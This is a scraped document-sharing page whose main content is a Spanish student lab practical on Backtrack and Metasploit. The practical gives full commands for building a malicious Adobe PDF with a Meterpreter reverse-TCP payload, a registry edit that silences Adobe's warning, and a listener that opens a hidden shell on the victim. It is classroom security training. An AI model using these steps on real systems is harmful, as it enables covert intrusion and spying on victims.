cuadernillo de lectoescritura para niños de básicacuadernillo de lectoescritura para niños de básica
cuadernillo de lectoescritura para niños de básica
 
Fisiologia.Articular. 3 Kapandji.6a.Ed.pdf
Fisiologia.Articular. 3 Kapandji.6a.Ed.pdfFisiologia.Articular. 3 Kapandji.6a.Ed.pdf
Fisiologia.Articular. 3 Kapandji.6a.Ed.pdf
 
PPTX: La luz brilla en la oscuridad.pptx
PPTX: La luz brilla en la oscuridad.pptxPPTX: La luz brilla en la oscuridad.pptx
PPTX: La luz brilla en la oscuridad.pptx
 
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdf
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdfFichas de MatemáticA QUINTO DE SECUNDARIA).pdf
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdf
 
VISITA À PROTEÇÃO CIVIL _
VISITA À PROTEÇÃO CIVIL                  _VISITA À PROTEÇÃO CIVIL                  _
VISITA À PROTEÇÃO CIVIL _
 
Actividad transversal 2-bloque 2. Actualización 2024
Actividad transversal 2-bloque 2. Actualización 2024Actividad transversal 2-bloque 2. Actualización 2024
Actividad transversal 2-bloque 2. Actualización 2024
 
TL/CNL – 2.ª FASE .
TL/CNL – 2.ª FASE                       .TL/CNL – 2.ª FASE                       .
TL/CNL – 2.ª FASE .
 
DETALLES EN EL DISEÑO DE INTERIOR
DETALLES EN EL DISEÑO DE INTERIORDETALLES EN EL DISEÑO DE INTERIOR
DETALLES EN EL DISEÑO DE INTERIOR
 
Manejo del Dengue, generalidades, actualización marzo 2024 minsa
Manejo del Dengue, generalidades, actualización marzo 2024 minsaManejo del Dengue, generalidades, actualización marzo 2024 minsa
Manejo del Dengue, generalidades, actualización marzo 2024 minsa
 
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO  2024 MINEDUFICHA DE MONITOREO Y ACOMPAÑAMIENTO  2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDU
 

Seguridad: Backtrack1_bis

  • 1. HACKING BACKTRACK 1 OBJETIVO DE LA PRÁCTICA Desearemos desde un PC atacante hacer una conexión remota a un PC víctima. Esta conexión será “malintencionada” y se realizará desde el puerto 4444 a través del Sistema Operativo Backtrack creando un archivo .PDF infectado y enviándolo al PC víctima. Una vez el PC victima abra el archivo, se abrirá un backdoor y desde el PC atacante podremos acceder a la Shell de la víctima y podremos visualizar todo su contenido. DETALLES A TENER EN CUENTA La realización de esta práctica ha supuesto unas complicaciones externas debido a algunos detalles que explicaremos a continuación.       Trabajaremos con MSFConsole en el entorno Backtrack. Cuando se crea el PDF, tenemos que agregar la IP del Atacante en el comando lhost. La versión de Adobe Reader que debe tener el cliente será la 9.0. Se han editado los registros de Adobe Reader para permitir el uso del .exe. Se ignorará el hecho de realizar la conexión con el puerto 443. La víctima debe tener desactivado el Firewall.
  • 2. ESQUEMA DE LA PRÁCTICA Equipo atacante = 192.168.1.2 Equipo víctima = 192.168.1.3 Como podemos ver en el dibujo, ambos PCs deben estar conectados en la misma red para realizarse el ataque. Para ello los hemos puesto a ambos en una VMnet juntos. El Equipo víctima será quien tenga el .PDF infectado y quien será atacado por el equipo 1.2. PROCEDIMIENTO DE LA PRÁCTICA Para empezar la práctica, primero de todos tendremos que contar con un sistema operativo llamado Backtrack, basado en distribuciones Linux. Este O.S. es una herramienta bastante particular basada en este tipo de ejemplos y prácticas en cuanto a “jugar” con la red. El primer paso será crear un archivo .PDF. Éste será la base de nuestro ataque. Gracias a él podremos infectar a la víctima una vez abra el archivo que le enviaremos. Abriremos la terminal del Backtrack y utilizaremos la MSFConsole. Esta consola se centra y permite un acceso eficiente a las opciones relacionadas con los Exploits que se utilizarán. Gracias a ésta, se facilita el uso de las herramientas.
  • 3. CREACIÓN DEL PDF… A la hora de crear el PDF, tenemos que tener en cuenta los siguientes comandos (que utilizaremos):  use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs. Sirve para decirle que vamos a utilizer un exploit con Adobe PDF embedded y un .exe como extensión.  set payload windows/meterpreter/reverse_tcp Es el Payload, que nos devolverá un Meterpreter. El Payload traducido es la carga útil, es la información del envío de datos que usaremos para el ataque.  set lhost 192.168.1.2. Añadiremos la IP del Atacante.  set filename vellimalote.pdf Crearemos un PDF con el nombre indicado.  Exploit Cargaremos el exploit para que se cree.
  • 4. TRANSMISIÓN DEL ARCHIVO Ahora, de cualquier forma tenemos que conseguir que la víctima reciba dicho archivo PDF creado. En este paso nosotros directamente lo hemos enviado o traspasado por un USB para facilitar el uso de éste. Localizaremos el archivo, en la ruta donde se ha guardado: /msf4/local/vellimalote.pdf *Hay dos archivos, vellimalo y vellimalote porque se hicieron varias pruebas. Pero el que nos servirá y estamos utilizando es Vellimalote.pdf Enviaremos el archivo a la máquina Windows 7, que será la víctima: Hay que tener en cuenta, que la víctima debe tener un Adobe Reader inferior a la versión 9.3. En nuestro caso utilizaremos la 9.0, que no dará muchos problemas a la hora de realizar la apertura del archivo.
  • 5. DETALLES DE ADOBE READER La realización de la práctica ha sido ardua básicamente por los permisos y versiones de Adobe Reader. Para que funcionara 100% hemos hecho unos cambios, encontrados en Internet.  Actualizar el registro de Adobe Reader. Después de una búsqueda exhaustiva por Internet, muchos usuarios coincidían en que el registro de Adobe Reader debía ser cambiado. Para ello utilizaremos la herramienta de Windows, “regedit” y seguiremos la siguiente ruta: HKEY_LOCAL_Machine / Software / Policies / Adobe / Acrobat Reader / 9.0 / FeatureLockDown / cDefaultLaunchAttachmentPerms Una vez dentro, veremos esto: Editaremos el registro “BuiltInPermList” y le quitaremos la extensión .exe. De esta forma, cuando abramos el archivo PDF no nos surgirá ningún mensaje molesto relacionado con la infección o el mal uso del archivo.
  • 6. EMPIEZA EL ATAQUE Una vez solucionados todos los problemas con la víctima, realizaremos el ataque desde nuestro atacante, valga la redundancia. Utilizaremos los siguientes comandos:  Use exploit/multi/handler Utilizaremos el controlador del Exploit.  Set payload Windows/meterpreter/reverse_tcp Utilización del TCP (lo mismo que cuando creamos el PDF).  Set lhost 192.168.1.2 Agregamos la IP del atacante.  Exploit Arrancamos el exploit. El ataque será enviado mediante escucha. Es decir, que cuando la víctima abra el archivo infectado (enviado anteriormente, el PDF) será cuando el atacante podrá entrar en la Shell del usuario y entonces el ataque habrá sido realizado correctamente.
  • 7. MODO ESCUCHA La víctima abrirá el archivo PDF y comprobará que le sale una terminal extraña, que desaparecerá al momento. Cuando el usuario víctima ve esto, en la mayoría de los casos se despreocupa y sigue realizando las tareas que estaba haciendo, pero realmente este ha sido el momento de infección, ya que el atacante ha podido realizar la conexión. El atacante estará esperando (modo escucha) y verá cómo se crea la conexión:
  • 8. Dentro del parámetro meterpreter, ponemos “Shell” para meternos dentro del PC de la víctima, sin que éste se dé cuenta de nada. Y como podemos ver, ya estamos dentro del Desktop de la víctima: A partir de ahora podemos navegar por el PC de la víctima y realizar maldades o simplemente ser un cotilla y ver toda la información que tiene el usuario. José Mª Vellido – ASIX2M Hacking Backtrack 1 – SEGDISP Fran Pérez – 2013/2014